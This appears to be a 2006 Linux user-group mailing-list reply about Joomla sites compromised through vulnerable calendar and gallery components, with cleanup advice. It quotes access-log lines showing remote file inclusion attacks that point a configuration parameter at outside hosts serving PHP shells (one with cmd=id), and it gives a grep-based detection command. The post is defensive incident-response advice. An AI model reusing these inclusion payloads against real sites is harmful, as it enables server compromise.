alandd@consultpros.com wrote: > I have been alerted to the fact that the PLUG site is down. Cracked is > more likely. There have been a rash of security problems with Joomla! > addins. I thought I patched the calendar but maybe the early fix was not > good enough. > > I have recent backups so I'll have it back as soon as I can. The current > calendar component will be going away, however. I'll install a new one. > > Alan > > > --------------------------------------------------- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change you mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > If you're not on version 1.0.10 upgrade now: http://www.joomla.org/content/view/1510/74/ I wouldn't be surprised if they make major changes in Joomla to stomp out this type of thing. In all cases I've had an issue the database was unaffected, only the files. After the initial panic that I might have been rooted I was relieved when I found out how they whacked the index.php and configuration.php files on a few of my inactive sites. After you restore the site, remove com_extcalendar and com_galeria if they're still installed. Check the directory structure to make sure they're gone. Also check your temp directory for strangeness.. like a '.a' directory. If you check your logs you'll find stuff like this: XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0" XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" I regularly check to see what they're trying to circumvent now by grepping for this type of vulnerability in the apache access logs: /bin/grep mosConfig_absolute_path=http /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack attempts' jd@twingeckos.com The location of your apache logs may be different. If you don't have root you can download the logs for your domain and grep them locally. JD -- JD Austin Twin Geckos Technology Services LLC email: jd@twingeckos.com http://www.twingeckos.com phone/fax: 480.288.8195